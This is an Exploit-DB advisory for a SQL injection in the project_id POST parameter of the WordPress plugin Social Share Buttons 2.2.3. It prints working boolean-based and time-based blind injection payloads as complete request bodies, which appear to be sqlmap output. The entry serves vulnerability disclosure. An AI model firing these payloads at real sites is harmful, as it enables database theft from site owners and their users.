Social-Share-Buttons v2.2.3 - SQL Injection

EDB-ID:

51116

CVE:

N/A




Platform:

PHP

Date:

2023-03-28


## Title: Social-Share-Buttons v2.2.3 - SQL Injection
## Author: nu11secur1ty
## Date: 09.16.2022
## Vendor: https://wordpress.org/
## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3


## Description:
The `project_id` parameter from the Social Share Buttons-2.2.3 on the
WordPress-6.0.2 system appears to be vulnerable to SQL injection
attacks.
The malicious user can dump-steal the database, from this system and
he can use it for very malicious purposes.
WARNING: The attacker can retrieve all-database from this system!
NOTE: The users of this system are NOT protected, this SQL
vulnerability is CRITICAL!

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: project_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND
'KWbC'='KWbC&network_id=5&post_id=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)

## Proof and Exploit:
[href](https://streamable.com/m9r76w)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>